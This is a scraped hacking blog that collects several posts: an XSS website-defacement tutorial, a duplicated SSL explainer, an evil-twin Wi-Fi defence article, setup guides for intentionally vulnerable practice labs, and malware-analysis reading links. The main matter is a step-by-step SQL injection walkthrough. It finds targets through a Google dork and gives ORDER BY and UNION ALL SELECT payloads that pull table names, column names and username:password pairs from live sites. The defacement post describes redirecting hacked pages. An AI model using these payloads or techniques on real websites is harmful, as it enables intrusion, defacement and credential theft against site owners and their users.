Friday, April 24, 2015
How to deface website with Cross Site Scripting ? : Complete XSS Tutorial
This is my third article about Cross site Scripting Tutorial. Last time, i explained how to do vulnerability test for XSSand some filter bypassing technique. Now let us see how a hacker deface a website with XSS vulnerability?
Never implement this technique. I am just explaining it for educational purpose only.
Defacing is one of the most common thing when the hacker found the vulnerability in website. Defacing is changing the content the website hacker content. Most of time, attacker use this technique to inform about the vulnerability to Admin. But it’s bad idea..!
Script for chaning the background Color of a website:
Script for chaning the background image of a website:
Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.co m and get the link.
When you find a XSS vulnerable site, then insert the script as :
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
Wednesday, April 15, 2015
Secure Sockets Layer Tutorial | What is SSL | SSL Hackers Guide
You might have heard some times that not to give your password or credit card information or any other sensitive information on public computers or on Facebook, yahoo etc chats.The reason why you might have heard that the Hackers have some ways to you would have probably heard that hackers have a way to steal your your credit card numbers , passwords etc.
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.
Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.
If two users want to have a secure communication they can also use cryptography to accomplish it
For example:
TFDVSF=Encrypted Text
SECURE= Decrypted Text
You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is “1“, What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video –
So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data.
Suppose there exists two communication parties A (client) and B (server)
When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say “Password” it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.
This scenario is illustrated using the following figure -
In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure –
A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.
The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate.
In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.
 |
| Secure Sockets Lock Tutorial | What is SSL | SSL Hackers Guide |
A hacker can use different types of attacks such as Packet sniffing or ARP Poisoning to steal your sensitive information.
Secure Sockets Layer (SSL) is the most widely used technology for creating a secure communication between the web client and the web server. You must be familiar with http:// protocol and https:// protocol, You might be wondering what they mean. HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a secure communication.
Cryptography
If two users want to have a secure communication they can also use cryptography to accomplish it
For example:
TFDVSF=Encrypted Text
SECURE= Decrypted Text
You might be wondering how i Decrypted it, Here i have used Algorithm=+ for the communication and the key is “1“, What comes after S is T so as you can see that S is converted into T, What comes After E is F to letter E from the word secure if converted into F and so on, To help you understand this more better I am adding a Video –
So If the hacker starts sniffing from between he will get Encrypted text and as the Hacker does not know the keys so he cant decrypt it, but if the attacker or hacker is sniffing from the starting point so he will get the key and can easily Decrypt the data.
Standard Communication VS Secure communication
Suppose there exists two communication parties A (client) and B (server)
Standard communication(HTTP)
When A will send information to B it will be in unencrypted manner, this is acceptable if A is not sharing Confidential information, but if A is sending sensitive information say “Password” it will also be in unencrypted form, If a hacker starts sniffing the communication so he will get the password.
This scenario is illustrated using the following figure -
 |
| Standard Communications HTTP |
Secure communication(HTTPS)
In a secure communication i.e. HTTPS the conversation between A and B happens to be in a safe tunnel, The information which a user A sends to B will be in encrypted form so even if a hacker gets unauthorized access to the conversion he will receive the encrypted password (“xz54p6kd“) and not the original password.
This scenario is illustrated using the following figure –
 |
| Secure communication(HTTPS) |
How is HTTPS implemented?
A HTTPS protocol can be implemented by using Secure Sockets Layer (SSL), A website can implement HTTPS by purchasing SSL certificate.
Which websites need SSL Certificate?
The websites where a private conversation is occurred, Websites related to online transactions or other sensitive information needs to be protected needs to SSL Certificate.
How to identify a Secure Connection?
In Internet Explorer and google chrome, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
If you are making an online transaction through Credit card or any other means you should check if https:// secured communication is enabled.
Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8
SQL Injection flaw is quite easiest to exploit and protect too but only when you know how to do it. In continuation to our Injection attacks tutorial series, today we will learn about Union Exploitation Technique to exploit SQL Injection Vulnerability. Union exploitation technique is most common and easiest way to exploit SQL injection vulnerability to hack into websites and if you know how to do it then its same the other way around i.e. Protect SQL Injection vulnerability to be exploited by Union Exploitation technique. So lets learn about Union Exploitation Technique in detail with help of examples.
 |
| Union Exploitation Technique to Exploit SQL Injection Vulnerability | Injection attacks – Part 8. |
Note: This article is for education purposes only. Any misuse may lead to harsh cyber law charges and even imprisonment.
But before that let me brief all of you about what is Union Operator? Union is an inbuilt keyword in almost all databases which is used to join a query. In SQL, we normally used Union operator to link another SQL query with original query. Hackers use this concept to exploit SQL Injection flaws to run their own SQL queries to retrieve information like usernames, passwords and other juicy information from victims databases.
Here’s a brief about procedure that we are going to learn to exploit SQL Injection using Union Exploitation Technique:
1. Find the Vulnerable website which is vulnerable to SQL Injection.
2. Find the Number of Columns in website using Order by clause.
3. Find most vulnerable columns which can be used to exploit SQL Injection Vulnerability using Union operator.
4. Test run to validate that column found is vulnerable by querying version information.
5. Use Information Schema to get Table Names
6. Use Information Schema to get Column Names
7. Use Information Schema to get Column values. For example: Username, passwords, customer information.
Oops…. That’s it all about Union Exploitation technique to exploit SQL injection vulnerability to own or hack any vulnerable website. Now lets learn in detail how to use union Exploitation technique to Exploit SQL Injection Vulnerability.Let’s learn the process in detail.Union Exploitation Technique to Exploit SQL Injection Vulnerability:
Use Google to find Vulnerable website by searching for below query :
Step 1: Finding SQL injection vulnerable websites:
We have already learned this in our previous articles, if somebody missed here is brief:Use Google to find Vulnerable website by searching for below query :
inurl:php?id=There are several other dorks to find SQL injection vulnerable websites but above one is easiest and success rate almost 90-95%.
Now Google search will display some results. Open any one of them, say
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
www.example.com/shop.php?id=6Now to check if its vulnerable to SQL Injection or not, just add ‘(single quote) at end of it i.e. query will become something like below:
www.example.com/shop.php?id=6′Now if you get error something like below, then it means website is vulnerable to SQL Injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1or something like below:
Query failed: You have an error in your SQL syntax near ”6”’ at line 1or any other error.
Step 2: Finding Exact Number Columns in Website
Once you know that website is vulnerable to SQL Injection, next step is to find exact number of columns in website database. Which you can know by running below query :www.example.com/shop.php?id=6 ORDER BY <NUM>–Now say website has 16 columns, which you don’t know then you can get it by using binary search approach. For example running below manner sequences:
www.example.com/shop.php?id=6 ORDER BY 10–Result : Some page opens with data i.e. no error page.Then incrementing it by 10 i.e.
www.example.com/shop.php?id=6 ORDER BY 20–and so on until you get below error message :
Unknown column ‘<NUM>’ in ‘order clause’or any other custom message.Once you get the above error message, then it means you exceeded the exact column numbers so decrease it one by once until to error is gone. Last successful page means exact column count. Say you get 16 columns. Then last successful request executed must be :
www.example.com/shop.php?id=6 ORDER BY 16–This steps will give exact number of columns in the database of website.
Step 3: Finding Vulnerable Columns using UNION ALL clause.
Once you know the exact number of columns in database then you can get list of all vulnerable columns by running below query:www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–This will result in some page and on that page some numbers will be displayed. Those are actually vulnerable columns. Now say 2, 4 and 8 are displayed on page. This means column 2, column 4 and column 8 are most vulnerable columns which can be used to run your own SQL queries.If above query execution shows normal web page as it usually displays then it means query is failed. Then we used field exploitation technqiue by inserting ‘-‘ in ID value. So the query will become something like below:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–Wow, now you have some numbers scattered over web page, which means vulnerable columns on website.
Step 4: Test run to validate vulnerable columns
Now we have list of all vulnerable columns, next step will be validating that we are correct.Easiest way to validate is executing version() command in vulnerable column, for example, say column 2 was vulnerable:www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16–Now in place of 2 on web page you will get the version number displayed. Check this for all vulnerable columns.
Step 5: Use information Schema to get Table Names
Now we know vulnerable columns of database, next step will be extracting table names from the database. This can be achieved by knowing concepts of Information schema.Learn more about information schema to extract table names here:http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using information schema we can execute query as if we are administrators. So in order to extract table names we will run below query on column 2 (vulnerable column).
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()–Above query will give you complete list of tables present in the database. You know which table you need to search for Username and passwords :D.Step 6: Use information schema to get Column namesUsing the same concept used in step 5, we will use information schema to extract column names too.Learn more about Information Schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now to extract column names from database, below query will work like Bulls Eye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()–The above query will result into extracting all column names.Step 7: Use Information Schema concept to get column values of required tableWell till now we have table names, column names. Only thing left is data from tables. Now say we got some table as USERS which has column names USERNAME and PASSWORD. In order to extract data from USERS table below query is sufficient :
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS–Above query will result into displaying usernames and passwords in below format username:password as 0x3a is hex value for ‘:’.That’s it guys, now you have username, password, table names, passwords. What else do you need.That’s all for today, we will continue to learn more about injection attacks in later tutorials.If you have any queries of doubts, feel free to ask.
Wednesday, April 1, 2015
Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend
Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit…less than ethically.
One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.
What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.
To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is sued during a fake Wi-Fi attack includes:
*.AirSSL
*.AirJack
*.Airsnarf
*.Dsniff
*.Cain
*.void11
No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.
If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (on which is quicken by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.- You wouldn’t think twice. That’s what the hackers are counting on – you not thinking.
How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking – you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.
When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.
How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:
*.The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember – if a deal seems too good to be true, like free wifi, it probably is.
*.Use different login details and passwords for public wifi.
Disconnect auto-connect when you’re in unfamiliar territory.
*.Be cautious when connects suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to their fake wifi.
*.Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
*.If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.
That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.
A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection( the BREACHmethod), so you may want to explore using this with a secondary defensive measure.
The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack…I’ll take a funny look or two
Java Vulnerable Lab – Learn to Hack and secure Java based Web Applications
We ( Cyber Security and Privacy Foundation) have developed a vulnerable Java based Web Applicatoin . This app is intended for the Java Programmers and other people who wish to learn about Web application vulnerabilities and write secure code.
Thefull course on Hacking and Securing Web JavaPrograms is available in
https://www.udem y.com/hacking- securing-java-web- programming/
Warning:Don’t run this app in Your Main Machine or in an online server. Install it in Vitual Machine.
How to setup Java Vulnerable Lab?
Method 1.Very Easiest Method : VirtualBox VMThe Most easiest way to use Java Vulnerable is using the VirtualBox VM which has everything set up and ready to use.
Steps:
1. Install the VirtualBox : https://www.virt ualbox.org /wiki/Download s
2. Download the VM Image from here : http://sourcefor ge.net/projects /javavulnerablela b/files /v0.1/JavaVulner ableLab.ova /download
3. Import the JavaVulnerable.ova into VirtualBox.
4. Change the Network Settings to Host-Only Network
5. Start the Machine and Log into the Machine( Credentials; username: root password: cspf)
6. Start Tomcat by entering "service tomcat start" in the Terminal
7. Start mysql by entering "service mysql start" in the Terminal
8. Find the IP Address of Machine
9. In your Browser, go to "http://[IP_ADDRESS_OF_VM]:8080/JavaVulnerableLab/install.jsp
10. Click the Install Button
11. Enjoy :)
Method 2.Easiest Method : Standalone Web ApplicationIn this mehtod, you will be running an executable “JAR” file which runs the application with an embedded Apache Tomcat.
Steps:
1. Install JDK
2. Download Executable Jar from here: http://sourcefor ge.net/projects /javavulnerablela b/files /v0.2/JavaVulner ableLab.jar /download
3. Double Click the JavaVulnerable.jar to run( if double click is not working, run this command "java -jar JavaVulnerable.jar" in your Terminal or CMD)
4. In your Browser, go to " http://localhost: 8080 /JavaVulnerableL ab/install.jsp
5. Click the Install Button
Method 3. Using War file:This is a NORMAL method to deploy the WAR file.
Steps:
1. Install Apache Tomcat server
2. Go to http://[Tomcat_INSTALLED_IP]:8080/manager/ (make sure you have modified tomcat-users.xml file of the tomcat to allow the manager).
3. Download our WAR file from here: https://sourcefo rge.net/projects /javavulnerablela b/files/latest /JavaVulnerableL ab.war /download
4. Deploy the WAR in Apache Tomcat manager.
5. Go to http://[Tomcat_INSTALLED_IP]:8080/JavaVulnerableLab/install.jsp
6. Click the Install Button
You can contribute or get the source code of Java Vulnerable Lab from here:
https://github.co m/breakthesec /JavaVulnerableL ab
BTS PenTesting Lab – a vulnerable web application to learn common vulnerabiliti es
The most common question from students who is learning website hacking techniques is “how to test my skills legally without getting into troubles?”. So, i always suggest them to use some vulnerable web application such as DVWA.
However, i felt dvwa is not suitable for new and advanced techniques. Mutillidae is one of the best web application vulnerable app to date. However, I missed some techniques/features in Mutillidae. so i thought it is better develop our own app to teach the web application pentesting for my readers and students.
BTS PenTesting Lab is a vulnerable web application that allows you to learn from basic to advanced vulnerability techniques.
Currently, the app contains following vulnerability types:
SQL Injection
Cross Site scripting(XSS)
Cross Site request Forgery(CSRF)
Clickjacking
Server Side Request Forgery(SSRF))
File Inclusion(RFI and LFI)
Command Execution
You can download our app from here:
https://sourceforge .net/p/btslab/
or
https://github.com /breakthesec/btslab
How to run BTS PenTesting Lab?
1. Install XAMPP or WAMPP in your machine
2. Extract the bts_lab zip file into the htdocs folder.
3. Open the “ http://localhost /bts_lab/setup.php” url in your browser.
4. Click the Setup.
That’s all Now you can start to use the app at “http://localhost/bts_lab”
List of Best sites to learn Malware Analysis
are you interested to learn Malware analysis and searching for the best resources?! Ok , i will give the list of sites where you can learn the malware analysis.
Resources for learning Malware Analysis
Malware Analysis Tutorials: a Reverse Engineering Approach
A series of Malware analysis tutorial written by Dr. Xiang Fu. In this blog, you will learn how to setup your malware analysis lab and do code analysis part using Immunity Debugger.
Link: Dr. Fu’s Security Blog
Step-by-Step Reverse Engineering Malware: ZeroAccess / Max++ / Smiscer Crimeware Rootkit:
This four part article series is a complete step-by-step tutorial on how to reverse engineer the ZeroAccess Rootkit.
Link: InfoSec Institute
Practical Malware Analysis Tutorials
This page contains series of malware analysis tutorial that demonstrate how to dissect the different malware samples.
Link: Tutorial from Malware.lu
Sinowal analysis:
The full analysis report of Sinowal. Sinowal (also known as Torpig or Anserin) is constant one of the top banking trojan all over the world since 2006.
Link: http://www.evild3a d.com/?p=1556
Analysis of Shylock Trojan:
Shylock is a new Trojan discovered by trusteer around 2 months ago. It is designed to be a Trojan Spy and specifically a Banker. Targets the windows platform, collects various system information from the infected system and send it to a remote C&C server, able to perform Man in the Browser attacks (IE and FF) against users of UK banks.
Link: http://p4r4n0id.co m/
Subscribe to:
Posts (Atom)